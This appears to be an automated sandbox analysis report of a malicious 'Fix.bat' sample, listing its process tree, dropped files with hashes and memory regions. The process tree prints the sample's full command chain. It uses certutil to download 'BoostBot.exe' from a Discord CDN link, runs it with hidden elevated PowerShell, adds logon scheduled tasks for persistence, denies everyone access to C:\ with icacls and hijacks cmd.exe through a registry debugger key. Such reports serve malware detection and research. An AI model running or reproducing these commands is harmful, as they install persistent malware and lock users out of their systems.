                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1860
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:2004
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                      1⤵
                                                        PID:2016
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                        1⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1420
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        1⤵
                                                          PID:1732
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                          1⤵
                                                            PID:1808
                                                          • C:\Windows\System32\spoolsv.exe
                                                            C:\Windows\System32\spoolsv.exe
                                                            1⤵
                                                              PID:2148
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                              1⤵
                                                                PID:2212
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                1⤵
                                                                  PID:2384
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2524
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                    1⤵
                                                                      PID:2532
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                      1⤵
                                                                        PID:2692
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                        1⤵
                                                                        • Drops file in System32 directory
                                                                        PID:2744
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                        1⤵
                                                                          PID:2800
                                                                        • C:\Windows\sysmon.exe
                                                                          C:\Windows\sysmon.exe
                                                                          1⤵
                                                                            PID:2828
                                                                          • C:\Windows\System32\svchost.exe
                                                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                            1⤵
                                                                              PID:2868
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                              1⤵
                                                                                PID:2876
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                1⤵
                                                                                  PID:3020
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:3104
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                    1⤵
                                                                                      PID:3468
                                                                                    • C:\Windows\Explorer.EXE
                                                                                      C:\Windows\Explorer.EXE
                                                                                      1⤵
                                                                                      • Suspicious use of UnmapMainImage
                                                                                      PID:3548
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fix.bat"
                                                                                        2⤵
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:2824
                                                                                        • C:\Windows\system32\certutil.exe
                                                                                          certutil -urlcache -split -f "https://cdn.discordapp.com/attachments/1237881664131174481/1239282786335064204/BoostBot.exe?ex=66425b89&is=66410a09&hm=76121e524db94e51397af0fa52812c443a6cb5a194da52bb2909deb394f90aee&" BoostBot.exe
                                                                                          3⤵
                                                                                            PID:3856
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Process -FilePath 'BoostBot.exe' -Verb RunAs"
                                                                                            3⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:2124
                                                                                            • C:\Users\Admin\AppData\Local\Temp\BoostBot.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\BoostBot.exe"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:4728
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\BoostBot.exe" /rl HIGHEST /f
                                                                                                5⤵
                                                                                                • Creates scheduled task(s)
                                                                                                PID:2712
                                                                                              • C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"
                                                                                                5⤵
                                                                                                • Checks computer location settings
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:1340
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f
                                                                                                  6⤵
                                                                                                  • Creates scheduled task(s)
                                                                                                  PID:1660
                                                                                                • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:100
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  "schtasks" /delete /tn "$sxr-powershell" /f
                                                                                                  6⤵
                                                                                                    PID:4940
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RezYbX3vRPUc.bat" "
                                                                                                    6⤵
                                                                                                      PID:5016
                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        7⤵
                                                                                                          PID:3204
                                                                                                        • C:\Windows\SysWOW64\chcp.com
                                                                                                          chcp 65001
                                                                                                          7⤵
                                                                                                            PID:4212
                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                            ping -n 10 localhost
                                                                                                            7⤵
                                                                                                            • Runs ping.exe
                                                                                                            PID:4644
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                                          6⤵
                                                                                                          • Loads dropped DLL
                                                                                                          PID:2888
                                                                                                        • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                                          "SCHTASKS.exe" /create /tn "$77$sxr-powershell.exe" /tr "'C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe'" /sc onlogon /rl HIGHEST
                                                                                                          6⤵
                                                                                                          • Creates scheduled task(s)
                                                                                                          PID:3964
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                                        5⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4944
                                                                                                      • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                                        "SCHTASKS.exe" /create /tn "$77BoostBot.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\BoostBot.exe'" /sc onlogon /rl HIGHEST
                                                                                                        5⤵
                                                                                                        • Creates scheduled task(s)
                                                                                                        PID:4792
                                                                                                  • C:\Windows\system32\icacls.exe
                                                                                                    icacls "C:\" /deny *S-1-1-0:(OI)(CI)F /T
                                                                                                    3⤵
                                                                                                    • Modifies file permissions
                                                                                                    PID:2888
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Executable File Execution Options\cmd.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f
                                                                                                    3⤵
                                                                                                      PID:1996
                                                                                                    • C:\Windows\system32\attrib.exe
                                                                                                      attrib +h "C:\Users\Admin\AppData\Local\Temp\Fix.bat"
                                                                                                      3⤵
                                                                                                      • Views/modifies file attributes
                                                                                                      PID:2636
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                  1⤵
                                                                                                    PID:3644
                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                    1⤵
                                                                                                      PID:3860
                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                      1⤵
                                                                                                      • Modifies registry class
                                                                                                      • Suspicious use of UnmapMainImage
                                                                                                      PID:4024
                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:4108
                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:4500
                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                          1⤵
                                                                                                            PID:3872
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                            1⤵
                                                                                                              PID:2144
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                              1⤵
                                                                                                                PID:1048
                                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                1⤵
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                PID:1924
                                                                                                              • C:\Windows\system32\SppExtComObj.exe
                                                                                                                C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:4676
                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                  1⤵
                                                                                                                    PID:1496
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                    1⤵
                                                                                                                      PID:900
                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                      1⤵
                                                                                                                        PID:3448
                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:2648
                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                          1⤵
                                                                                                                          • Modifies registry class
                                                                                                                          PID:748
                                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                          1⤵
                                                                                                                          • Checks BIOS information in registry
                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                          • Enumerates system info in registry
                                                                                                                          PID:1580

                                                                                                                        Network

                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                        Replay Monitor

                                                                                                                        Loading Replay Monitor...

                                                                                                                        Downloads

                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                          Filesize

                                                                                                                          338B

                                                                                                                          MD5

                                                                                                                          644edf29269e86529e8e0870510c5678

                                                                                                                          SHA1

                                                                                                                          95de5f9adc0a1c42335f4ed77086c7f026fb7c23

                                                                                                                          SHA256

                                                                                                                          49ac3e3ced921de8c44fd193f9ea409ee3d16f760df36d933ac66c6ca65681a5

                                                                                                                          SHA512

                                                                                                                          f67961d2cc138838c815acdd56fa67fea32580857020390ccbf60b7c7bfbb66c8f4d1160541ff3b4a30669fa70c4c66ba9dc31de5e7e2da43a52d1bfc925655a

                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5E5B0733CDA24F9EF7038FEEB6987C6E

                                                                                                                          Filesize

                                                                                                                          556B

                                                                                                                          MD5

                                                                                                                          3636990eb953c6123a558e67542f1bb8

                                                                                                                          SHA1

                                                                                                                          42564285fe8ea304ecd4d3b9c72cfb7192074028

                                                                                                                          SHA256

                                                                                                                          b7729c39f5eb4fa39065c3c43c0ecbcd8da2dfe2ea5f4b48f3107c3b7acac983

                                                                                                                          SHA512

                                                                                                                          ae9dc383a14ffc0003b560fff33c8ee313f5fb723b6a6d91d5f151bd3994f1df3b6ac82db83308cefa17ee7bc7618a997dc02c848bc52157e8742ef49d842f3d

                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

                                                                                                                          Filesize

                                                                                                                          408B

                                                                                                                          MD5

                                                                                                                          c52c2214399f0029af65c3bc80a56cab

                                                                                                                          SHA1

                                                                                                                          2c0c3be6315de15bdf8dfeab11e4af0e91ec713f

                                                                                                                          SHA256

                                                                                                                          eccd6198ba66ac3a021dffd91ea42c420d9805cfec713db01f4b2d13edafc7f2

                                                                                                                          SHA512

                                                                                                                          60f414493c981e1ba0eb22f95d46f6bb2cd3e948cb0348dde6f75dd478608bbc4d0e09979e569a9e492aa07874824ba0152b516c122ecd8a222d44e78b52b5b8

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\BoostBot.exe

                                                                                                                          Filesize

                                                                                                                          409KB

                                                                                                                          MD5

                                                                                                                          404ab800bbe49c36bd64d0d73600b59a

                                                                                                                          SHA1

                                                                                                                          4c8dff2702fada108f7477ad357067310b584366

                                                                                                                          SHA256

                                                                                                                          5465f02f24ee5c1fc9c9c27c86c209eeddc2ed607143e1b76ca9c9d9b7b84154

                                                                                                                          SHA512

                                                                                                                          d0ecd88adfd84d9d8e845281e0437368aadf3d1d6fb704d7c7630d1360697471c2a49584f968eeebd5b435f11af9ce3d06327f1835fa5d07a140f22c0f95fc11

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RezYbX3vRPUc.bat

                                                                                                                          Filesize

                                                                                                                          283B

                                                                                                                          MD5

                                                                                                                          a4194184c2c895f8a5f184e76abe4fae

                                                                                                                          SHA1

                                                                                                                          540832fb4c6d0169fdf642ccba24d2823fa6b480

                                                                                                                          SHA256

                                                                                                                          15a96d789b4fa6d8618ce8a7108c4d9dd0066b3168a13f29ecfb625d96c55312

                                                                                                                          SHA512

                                                                                                                          97d82bda8782da48e3af665f33975de7ae87fd666722842231b88f27ceb2e64ecb40f25bb2f9a61c113d021a2612d74843da10fb953846c206672e584ef796a7

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k2ancs4c.j4i.ps1

                                                                                                                          Filesize

                                                                                                                          60B

                                                                                                                          MD5

                                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                          SHA1

                                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                          SHA256

                                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                          SHA512

                                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\install.exe

                                                                                                                          Filesize

                                                                                                                          162KB

                                                                                                                          MD5

                                                                                                                          152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                          SHA1

                                                                                                                          c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                          SHA256

                                                                                                                          a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                          SHA512

                                                                                                                          2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                                        • C:\Users\Admin\AppData\Roaming\$SXR-LOGS\05-12-~1

                                                                                                                          Filesize

                                                                                                                          224B

                                                                                                                          MD5

                                                                                                                          4f651dd522c656e7184fa37ed96984b5

                                                                                                                          SHA1

                                                                                                                          9b5f42eb0958b1ecbcf040844b73af010a0ebab6

                                                                                                                          SHA256

                                                                                                                          2658f044a34ac931c1a30a3027ae3638ba2cfdac1dac73618b13ccbe64cc62c2

                                                                                                                          SHA512

                                                                                                                          b4dab234f4543c313ae1b2cd0fa58bee9ac2011e0a3edfba6da5b8150af28ca2bc9afd80cc031b4ef9dd89fffef7d8b58e2a4e9d14421c4549a074c454ef0126

                                                                                                                        • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                          Filesize

                                                                                                                          2KB

                                                                                                                          MD5

                                                                                                                          2f57fde6b33e89a63cf0dfdd6e60a351

                                                                                                                          SHA1

                                                                                                                          445bf1b07223a04f8a159581a3d37d630273010f

                                                                                                                          SHA256

                                                                                                                          3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                                                                                                          SHA512

                                                                                                                          42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                                                                                                        • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                          Filesize

                                                                                                                          1KB

                                                                                                                          MD5

                                                                                                                          36fea3c7bd7bf5f15ee1a748daae1f24

                                                                                                                          SHA1

                                                                                                                          c5e0122744a61d18b64126bf35374e29ecfe7553

                                                                                                                          SHA256

                                                                                                                          bec6c6166fb67f7866ad5dad460b9212b3fe6a2f909638ec9abe465c6199ade4

                                                                                                                          SHA512

                                                                                                                          6ded68570e0234e985f5a58307e25f94e9980de39d306e16ab02d89f67b701c129ac740f48bc7f22a5befe78cbfe56bd76a31a12d17ffc973be1a8a3079de4c1

                                                                                                                        • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                          Filesize

                                                                                                                          1KB

                                                                                                                          MD5

                                                                                                                          aa187cac09f051e24146ad549a0f08a6

                                                                                                                          SHA1

                                                                                                                          2ef7fae3652bb838766627fa6584a6e3b5e74ff3

                                                                                                                          SHA256

                                                                                                                          7036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f

                                                                                                                          SHA512

                                                                                                                          960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2

                                                                                                                        • memory/380-115-0x00007FFBCEE10000-0x00007FFBCEE20000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/380-114-0x000001C683B20000-0x000001C683B4B000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/380-108-0x000001C683B20000-0x000001C683B4B000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/412-119-0x0000013A36580000-0x0000013A365AB000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/616-82-0x00007FFBCEE10000-0x00007FFBCEE20000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/616-75-0x000001C0043E0000-0x000001C00440B000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/616-73-0x000001C004390000-0x000001C0043B5000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          148KB

                                                                                                                        • memory/616-81-0x000001C0043E0000-0x000001C00440B000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/616-74-0x000001C0043E0000-0x000001C00440B000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/672-86-0x000002A94D3C0000-0x000002A94D3EB000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/672-92-0x000002A94D3C0000-0x000002A94D3EB000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/672-93-0x00007FFBCEE10000-0x00007FFBCEE20000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/948-103-0x0000016CB3ED0000-0x0000016CB3EFB000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/948-104-0x00007FFBCEE10000-0x00007FFBCEE20000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          64KB

                                                                                                                        • memory/948-97-0x0000016CB3ED0000-0x0000016CB3EFB000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          172KB

                                                                                                                        • memory/1340-52-0x0000000007030000-0x000000000703A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          40KB

                                                                                                                        • memory/2124-9-0x00007FFBF0843000-0x00007FFBF0845000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          8KB

                                                                                                                        • memory/2124-27-0x00007FFBF0840000-0x00007FFBF1301000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/2124-10-0x000001EBF6070000-0x000001EBF6092000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          136KB

                                                                                                                        • memory/2124-20-0x00007FFBF0840000-0x00007FFBF1301000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/2124-21-0x00007FFBF0840000-0x00007FFBF1301000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/3440-64-0x00007FFC0ED90000-0x00007FFC0EF85000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.0MB

                                                                                                                        • memory/3440-70-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/3440-65-0x00007FFC0CEF0000-0x00007FFC0CFAE000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          760KB

                                                                                                                        • memory/3440-63-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/3440-56-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/3440-57-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/3440-58-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/3440-59-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          32KB

                                                                                                                        • memory/3916-55-0x00007FFC0CEF0000-0x00007FFC0CFAE000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          760KB

                                                                                                                        • memory/3916-54-0x00007FFC0ED90000-0x00007FFC0EF85000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.0MB

                                                                                                                        • memory/3916-53-0x000001727D6A0000-0x000001727D6CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          168KB

                                                                                                                        • memory/4728-32-0x0000000006930000-0x000000000696C000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          240KB

                                                                                                                        • memory/4728-31-0x00000000063F0000-0x0000000006402000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          72KB

                                                                                                                        • memory/4728-30-0x00000000057E0000-0x0000000005846000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          408KB

                                                                                                                        • memory/4728-28-0x0000000005BC0000-0x0000000006164000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          5.6MB

                                                                                                                        • memory/4728-29-0x0000000005740000-0x00000000057D2000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          584KB

                                                                                                                        • memory/4728-26-0x0000000000CA0000-0x0000000000D0C000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          432KB